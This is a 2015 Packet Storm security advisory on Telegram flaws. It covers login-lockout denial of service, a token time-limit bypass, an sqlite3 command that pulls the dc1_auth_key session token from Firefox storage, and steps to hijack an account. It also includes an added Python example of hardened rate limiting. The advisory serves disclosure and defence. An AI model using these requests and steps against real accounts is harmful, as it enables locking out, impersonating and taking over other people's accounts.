Telegram Denial Of Service / Bypass Limit

2015-10-02T00:00:00
ID PACKETSTORM:133825
Type packetstorm
Reporter Eduardo Alves
Modified 2015-10-02T00:00:00

Description

                                        
#[+] Title: Telegram - Multiple Vulnerabilities  
#[+] Product: Telegram  
#[+] Vendor: http://telegram.org/  
#[+] SoftWare Link : https://web.telegram.org / https://my.telegram.org  
#  
# Author : Eduardo Alves  
# E-Mail : edudx1[ at ]gmail[ dot ]com  
# Website : tempest.com.br/en/  
  
  
  
Info:  
As we know, by default Telegram login is possible only with a  
token (5 digits).  
This token could be obtained through eavesdropping, desktop  
notifications, SMS, or incoming calls...  
  
  
  
###################################################################################  
#[1] my.telegram.org Denial Of Service  
  
The my.telegram.org website behaves inadequately, blocking a user's  
access after 5 consecutive incorrect phone number attempts.  
  
  
## PoC:  
---------------------------------------------------------------------------------  
POST /auth/send_password HTTP/1.1  
Host: my.telegram.org  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer: https://my.telegram.org/auth  
  
  
phone=%2B55818888888  
---------------------------------------------------------------------------------  
###################################################################################  
  
#[2] Bypass 5 minutes limit to input token  
  
After web.telegram.org asks for a new token, we have 5 minutes to send  
it.  
So, just use Telegram-CLI and you can bypass this limit.  
  
  
## PoC:  
---------------------------------------------------------------------------------  
Telegram-cli version 1.3.3, Copyright (C) 2013-2015 Vitaly Valtman  
Telegram-cli comes with ABSOLUTELY NO WARRANTY; for details type  
`show_license'.  
This is free software, and you are welcome to redistribute it  
under certain conditions; type `show_license' for details.  
Telegram-cli uses libtgl version 2.0.3  
Telegram-cli includes software developed by the OpenSSL Project  
for use in the OpenSSL Toolkit. (http://www.openssl.org/)  
Telegram-cli uses libpython version 2.7.6  
I: config dir=[/home/ubuntu/.telegram-cli]  
phone number: +558888888888  
code ('call' for phone call): <----- ex: You can put after 24 hours  
---------------------------------------------------------------------------------  
###################################################################################  
  
#[3] Telegram Denial Of Service in token request  
  
By submitting incorrect code attempts, an attacker prevents the legitimate  
user from asking for a new code for an indeterminate period of time.  
  
  
## PoC:  
---------------------------------------------------------------------------------  
Telegram-cli version 1.3.3, Copyright (C) 2013-2015 Vitaly Valtman  
Telegram-cli comes with ABSOLUTELY NO WARRANTY; for details type  
`show_license'.  
This is free software, and you are welcome to redistribute it  
under certain conditions; type `show_license' for details.  
Telegram-cli uses libtgl version 2.0.3  
Telegram-cli includes software developed by the OpenSSL Project  
for use in the OpenSSL Toolkit. (http://www.openssl.org/)  
Telegram-cli uses libpython version 2.7.6  
I: config dir=[/home/ubuntu/.telegram-cli]  
phone number: +558388888888  
code ('call' for phone call): 123123  
*** incorrect code  
code ('call' for phone call): 123123  
*** incorrect code  
code ('call' for phone call): 123123  
*** incorrect code  
code ('call' for phone call): 123123  
*** incorrect code  
code ('call' for phone call): 123123  
*** incorrect code  
code ('call' for phone call): 123123  
*** incorrect code  
code ('call' for phone call): 123123  
*** incorrect code  
---------------------------------------------------------------------------------  
Error: In web.telegram.org  
---------------------------------------------------------------------------------  
Method: auth.signIn  
Result:  
{"_":"rpc_error","error_code":420,"error_message":"FLOOD_WAIT_86129"}  
Stack: Error  
at h (https://web.telegram.org/js/app.js:16:26020)  
at https://web.telegram.org/js/app.js:16:27238  
at l (https://web.telegram.org/js/app.js:8:6393)  
at https://web.telegram.org/js/app.js:8:6565  
at u.$eval (https://web.telegram.org/js/app.js:8:13762)  
at u.$digest (https://web.telegram.org/js/app.js:8:12258)  
at https://web.telegram.org/js/app.js:8:13847  
at s (https://web.telegram.org/js/app.js:7:744)  
at https://web.telegram.org/js/app.js:7:2742  
at n (https://web.telegram.org/js/app.js:2:16525)  
---------------------------------------------------------------------------------  
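The following is an added illustration, not code from the advisory or from Telegram, of the server-side design choice behind [1], [2] and [3]: a lockout counted per phone number lets any unauthenticated party block the owner, and a code the server never expires lets any client submit it a day later. The hardened policy binds each code to the requesting session, expires it server-side, burns only that session's code on too many wrong guesses, and throttles code requests per source. All class and function names, thresholds (MAX_WRONG, CODE_TTL, MAX_REQ_PER_SOURCE, REQ_WINDOW), the VICTIM number and the clock are assumptions made for this example; only the 5-digit code length and the 86129-second FLOOD_WAIT come from the advisory.

```python
"""Added example, not code from the advisory or from Telegram: two server-side
policies for a one-time login code, compared on the lockout pattern of [1] and
[3] and the never-expiring code of [2]. Names, thresholds and the clock are assumed."""
import secrets

CODE_LEN = 5              # the advisory says the token is 5 digits
MAX_WRONG = 5             # assumed: wrong guesses tolerated per code
LOCK_SECONDS = 86129      # the FLOOD_WAIT value shown in the advisory
CODE_TTL = 300            # assumed: the 5-minute window, enforced server-side
MAX_REQ_PER_SOURCE = 3    # assumed: code requests per source per REQ_WINDOW
REQ_WINDOW = 3600         # assumed: seconds
VICTIM = "+550000000000"  # constructed placeholder number

def _new_code():
    return f"{secrets.randbelow(10 ** CODE_LEN):0{CODE_LEN}d}"

class GlobalLockout:
    """Weak policy: wrong attempts count against the phone number whoever makes
    them, and crossing MAX_WRONG blocks the number for LOCK_SECONDS, so any
    unauthenticated party can lock the owner out. The code never expires."""
    def __init__(self):
        self.codes, self.wrong, self.locked_until = {}, {}, {}

    def request_code(self, phone, source, now):
        if self.locked_until.get(phone, 0) > now:
            return None                      # the owner cannot even get a new code
        self.codes[phone] = _new_code()
        return phone, self.codes[phone]      # the "ticket" is just the phone number

    def verify(self, ticket, code, now):
        if self.locked_until.get(ticket, 0) > now:
            return "locked"
        if self.codes.get(ticket) == code:
            del self.codes[ticket]
            return "ok"
        self.wrong[ticket] = self.wrong.get(ticket, 0) + 1
        if self.wrong[ticket] >= MAX_WRONG:
            self.locked_until[ticket] = now + LOCK_SECONDS
            return "locked"
        return "wrong"

class SessionBoundLimit:
    """Hardened policy: a code is bound to the login session that requested it
    and expires server-side after CODE_TTL; wrong guesses burn only that session's
    code, and requests are throttled per source, so the guesser pays, not the owner."""
    def __init__(self):
        self.sessions, self.src_requests = {}, {}

    def request_code(self, phone, source, now):
        recent = [t for t in self.src_requests.get(source, []) if t > now - REQ_WINDOW]
        if len(recent) >= MAX_REQ_PER_SOURCE:
            return None                      # only this source is throttled
        self.src_requests[source] = recent + [now]
        sid = secrets.token_hex(8)
        self.sessions[sid] = {"phone": phone, "code": _new_code(),
                              "wrong": 0, "expires": now + CODE_TTL}
        return sid, self.sessions[sid]["code"]

    def verify(self, ticket, code, now):
        s = self.sessions.get(ticket)
        if s is None:
            return "no_session"
        if now > s["expires"]:
            del self.sessions[ticket]
            return "expired"                 # enforced whatever client submits it
        if secrets.compare_digest(s["code"].encode(), code.encode()):
            del self.sessions[ticket]
            return "ok"
        s["wrong"] += 1
        if s["wrong"] >= MAX_WRONG:
            del self.sessions[ticket]        # burn the code, not the phone number
            return "exhausted"
        return "wrong"

def _wrong_guess(real):
    return "00000" if real != "00000" else "00001"   # the simulation peeks only to stay wrong

def lockout_scenario(policy, now=1_000_000.0):
    """A third party requests a code for VICTIM and guesses wrong MAX_WRONG
    times; the real owner then tries to log in one minute later."""
    ticket, real = policy.request_code(VICTIM, "attacker-src", now)
    for _ in range(MAX_WRONG):
        policy.verify(ticket, _wrong_guess(real), now)
    owner = policy.request_code(VICTIM, "owner-src", now + 60)
    if owner is None:
        return "owner_locked_out"
    return policy.verify(owner[0], owner[1], now + 60)

def stale_code_scenario(policy, now=1_000_000.0):
    """The genuine code is submitted 24 hours after issuance."""
    ticket, code = policy.request_code(VICTIM, "owner-src", now)
    return policy.verify(ticket, code, now + 24 * 3600)

def guesses_per_window(policy, now=1_000_000.0):
    """Wrong guesses one source can make on VICTIM within REQ_WINDOW before refusal."""
    total = 0
    while (issued := policy.request_code(VICTIM, "attacker-src", now)) is not None:
        ticket, real = issued
        while policy.verify(ticket, _wrong_guess(real), now) == "wrong":
            total += 1
        total += 1                           # the guess that ended this code
    return total
```

Under GlobalLockout the owner is locked out for the full LOCK_SECONDS after someone else's five wrong guesses, and a genuine code is still accepted a day later; under SessionBoundLimit the owner logs in normally, the stale code is refused, and one source still gets at most MAX_WRONG * MAX_REQ_PER_SOURCE guesses per window. Per-source throttling does not by itself stop repeated code deliveries to a number; the usual complement is a short per-number send cooldown, which must stay short enough that it cannot be turned into the day-long block above.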
###################################################################################  
  
#[4] User identity validation absence  
  
In many scenarios, web applications require session management and access  
control mechanisms to ensure that certain actions are carried out  
exclusively by authenticated/authorized users.  
In web.telegram.org, this session control is implemented through Local  
Storage. As a result, an attacker who possesses the victim's valid  
dc1_auth_key can access the application alongside the true user of the  
given account.  
  
Ex: Firefox  
---------------------------------------------------------------------------------  
sqlite3 -header -separator " " webappsstore.sqlite "select * from  
webappsstore2;" > out.txt; cat out.txt | grep dc1_aut  
gro.margelet.bew.:https:443 dc1_auth_key  
---------------------------------------------------------------------------------  
###################################################################################  
  
#[5] Hijacking account and importing contacts  
  
If the victim uses only the passcode for two-step verification, the attacker  
can reset her account, which opens the possibility of importing her  
contacts and hijacking the account:  
  
  
- Attacker asks for token using Telegram-Web  
- Obtains the code  
- Resets account  
- Waits for the victim to log-in  
- Imports contacts (auto)  
- Kills the victim's session  
- Enables Two-Step verification (passcode + email)  
  
  
  
Thanks to:  
  
Leandro Oliveira  
Joaquim Brasil  
Marcelo Pessoa  
Toronto Garcez  
Tiago Barbosa  
  
From Tempest Security Intelligence  
  
  